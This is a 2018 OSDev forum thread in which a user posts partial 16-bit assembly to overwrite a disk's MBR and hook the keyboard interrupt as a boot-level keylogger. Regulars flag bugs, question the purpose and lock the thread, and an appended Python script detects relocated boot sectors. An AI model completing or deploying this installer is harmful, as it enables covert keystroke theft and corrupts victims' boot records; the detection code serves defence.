OSDev.org https://forum.osdev.org/ |
hook irq1 installed at MBR https://forum.osdev.org/viewtopic.php?f=13&t=32709 |
Author: | Apolo [ Wed Jan 24, 2018 7:46 am ] |
Post subject: | hook irq1 installed at MBR |
I am coding a program that hooks IRQ 1 and is installed onto the MBR and restores the original MBR that is saved at sector 7; however, the OS doesn't bootstrap. Here is my code:
Code:
org 100h
start:
MOV AX,201H
MOV BX,0E00H
MOV CX,1
MOV DX,80H
INT 13H
MOV AX,301H
MOV CX,7
INT 13H
MOV SI,int9_installer
MOV DI,0E00H
MOV CX,1FDH
REP MOVSB
ES MOV WORD[0FFEH],0AA55h
MOV AX,301H
MOV CX,1
INT 13H
RET
int9_installer:
cli
push es
mov ax,0
mov es,ax
es mov cx,[24h]
es mov dx,[26h]
...
mov cx,0
mov dx,2000h
es mov [24h],cx
es mov [26h],dx
pop es
sti
...
mov si,3100h
mov al,10h
mov [si],al
mov al,0
mov [si+1],al
mov al,01
mov [si+2],al
mov al,0
mov [si+3],al
MOV AX,7C00H
mov [si+4],ax
mov ax,0h
mov [si+6],ax
mov ax,7
mov [si+8],ax
xor ax,ax
mov [si+0ah],ax
mov [si+0ch],ax
mov [si+0eh],ax
mov ah,42h
mov dl,80h
INT 13H
JMP 0:7C00H
What is wrong with my code above??? |
Author: | iansjack [ Wed Jan 24, 2018 10:20 am ] |
Post subject: | Re: hook irq1 installed at MBR |
You don't initialize the segment registers, you don't initialize the direction flag, and you set the origin to 100h, which is almost certainly not what you intended. I'm not going to wade through the code to find other mistakes, but those ones need to be corrected first. |
Author: | AJ [ Wed Jan 24, 2018 10:44 am ] |
Post subject: | Re: hook irq1 installed at MBR |
Hi, In addition to iansjack's post, we have absolutely no context for the code. You call this a "program". Does that mean that it is *not* running in a freestanding environment (which could also explain the org directive)? We also don't have a very good idea of what you expect to see compared with what you actually do see. Can you use some other tool to verify that the sectors are on disk where you expect them to be? Cheers, Adam |
Author: | Apolo [ Wed Jan 24, 2018 11:22 am ] |
Post subject: | Re: hook irq1 installed at MBR |
My code is a keylogger that hooks IRQ 1 and is installed onto the MBR, and the original MBR is written at sector 7 to be jumped to after my keylogger is installed. The org 100h directive is because it is written in fasm. How do I set the direction flag, and what value should I set the segment registers to? |
Author: | iansjack [ Wed Jan 24, 2018 11:30 am ] |
Post subject: | Re: hook irq1 installed at MBR |
I think you need to learn a little more about how the processor works, its state after reset, and the boot sequence before attempting this sort of program. Also, I'm not convinced that you understand the ORG directive. And, I guess, the question is what are you attempting to achieve by hooking this interrupt. It is, potentially, something that I wouldn't feel comfortable helping with. |
Author: | Brendan [ Wed Jan 24, 2018 9:58 pm ] |
Post subject: | Re: hook irq1 installed at MBR |
Hi,
Apolo wrote: My code is a keylogger that hooks IRQ 1 and is installed onto the MBR, and the original MBR is written at sector 7 to be jumped to after my keylogger is installed. The org 100h directive is because it is written in fasm. How do I set the direction flag, and what value should I set the segment registers to?
To clear the direction flag, use the CLD instruction. The BIOS loads the MBR at "some combination of segment:offset that adds up to 0x0007C00". If you set ORG to 0x0100 (telling the assembler to assume the "offset" for the start of your code will be 0x0100) then you'd need your segments to fulfil the equation "0x0007C00 = (segment / 16) + 0x0100". That means you'd need to set segments to 0x07D0. Note that it's much easier to set ORG to 0x00007C00 and set all segments to zero.
For the rest, for assembly language there are only 2 kinds of bugs - the comments don't describe a correct algorithm, or the instructions don't match the comments. Your code has no comments and therefore your code is 100% bugs.
Finally; don't forget that all sane operating systems dispose of the BIOS early during boot and install their own (protected mode or long mode) device drivers with their own IRQ handlers; so (assuming things like TPM and "secureboot" don't do their job) your code still can't work.
Cheers, Brendan |
Author: | AJ [ Thu Jan 25, 2018 5:19 am ] |
Post subject: | Re: hook irq1 installed at MBR |
That last point is the most important for a keylogger. Any OS worth its salt will end up reinstalling an IDT and chances are your code will end up in an un-mapped memory page anyway. You'd generally be better off with a hardware key logger, but what you are doing may be at best immoral and at worst illegal. Before we go further, could you clarify the intention of what you are doing? If you're just playing with boot code on your own machine then fine. Cheers, Adam |
Author: | Apolo [ Fri Jan 26, 2018 4:26 am ] |
Post subject: | Re: hook irq1 installed at MBR |
I think the BIOS of my PCs is all infected, because I tried this simpler code and the PCs still don't bootstrap. See my simplest code:
Code:
start:
MOV AX,201H
MOV BX,0E00H
MOV CX,1
MOV DX,80H
INT 13H
MOV CX,7
MOV AX,301H
INT 13H
MOV CX,1BDH
MOV SI,example
MOV DI,0E00H
REP MOVSB
MOV AX,301H
MOV BX,0E00H
MOV AX,301H
MOV CX,1
INT 13H
RET
example:
MOV AX,201H
PUSH ES
MOV BX,0
MOV ES,BX
MOV BX,7C00H
MOV CX,7
INT 13H
POP ES
cs jmp bx
codesize:
Aaaaaaaaa! What is the problem with my code? |
Author: | iansjack [ Fri Jan 26, 2018 5:15 am ] |
Post subject: | Re: hook irq1 installed at MBR |
The main problem is that you haven't told us what you are trying to do and why. Until we know that it is unlikely that you will get any further help on this forum. It's devoted to OS development, not hacking. |
Author: | AJ [ Fri Jan 26, 2018 5:24 am ] |
Post subject: | Re: hook irq1 installed at MBR |
You get one more attempt at explaining why you are doing this before the thread gets locked. If you are doing this for legit reasons, it sounds like an interesting problem to tackle, but we will also need more of a technical explanation. A bug in your code or methodology is much more likely than your BIOS being infected. Cheers, Adam |
Author: | Apolo [ Fri Jan 26, 2018 5:31 am ] |
Post subject: | Re: hook irq1 installed at MBR |
In short: I am trying to bootstrap from sector 7, which is where the original MBR is written. Can someone help me?? I am desperate! |
Author: | AJ [ Fri Jan 26, 2018 6:02 am ] |
Post subject: | Re: hook irq1 installed at MBR |
Unfortunately locked as promised. I can only assume that this is being done for nefarious purposes... |
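The layout discussed in this thread (replacement code in sector 1, the original MBR parked at sector 7 with its 0xAA55 signature intact) leaves an artefact a defender can look for in a disk image. The following is an added example, not code from the thread or from OSDev: it scans the gap between the MBR and the first partition for sectors that still look like a boot sector. The function names and the sample image are constructed for illustration.

```python
import struct

SECTOR = 512
BOOT_SIG = b"\x55\xaa"          # on-disk bytes of the word 0xAA55 at offset 0x1FE
PTABLE = slice(0x1BE, 0x1FE)    # four 16-byte partition entries


def first_partition_lba(mbr: bytes) -> int:
    """Lowest starting LBA among non-empty partition entries (0 if none)."""
    starts = []
    for off in range(0x1BE, 0x1FE, 16):
        ptype = mbr[off + 4]
        lba = struct.unpack_from("<I", mbr, off + 8)[0]
        if ptype != 0 and lba != 0:
            starts.append(lba)
    return min(starts, default=0)


def find_parked_boot_sectors(image: bytes, max_scan: int = 63) -> list:
    """Flag sectors in the post-MBR gap that look like a relocated MBR."""
    mbr = image[:SECTOR]
    if len(mbr) < SECTOR or mbr[0x1FE:0x200] != BOOT_SIG:
        raise ValueError("sector 1 has no 0xAA55 boot signature")
    end = first_partition_lba(mbr) or max_scan
    end = min(end, max_scan, len(image) // SECTOR)
    hits = []
    for lba in range(1, end):
        sec = image[lba * SECTOR:(lba + 1) * SECTOR]
        if sec[0x1FE:0x200] != BOOT_SIG:
            continue
        hits.append({
            "chs_sector": lba + 1,  # cylinder 0, head 0: sector = LBA + 1
            "same_partition_table": sec[PTABLE] == mbr[PTABLE],
        })
    return hits


def build_sample_image(parked: bool) -> bytes:
    """Constructed 64-sector image with one partition starting at LBA 63."""
    table = bytearray(64)
    table[0:16] = struct.pack("<B3sB3sII", 0x80, b"\0\0\0", 0x83, b"\0\0\0", 63, 2048)
    original = bytes(0x1BE) + bytes(table) + BOOT_SIG
    image = bytearray(64 * SECTOR)
    image[:SECTOR] = original
    if parked:
        image[6 * SECTOR:7 * SECTOR] = original   # copy parked at CHS sector 7
        image[:0x1BD] = b"\x90" * 0x1BD           # constructed filler, not real boot code
    return bytes(image)
```

Some boot loaders and disk utilities also store data in this gap, so a hit is a lead to compare against a known-good MBR hash, not a verdict.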
All times are UTC - 6 hours |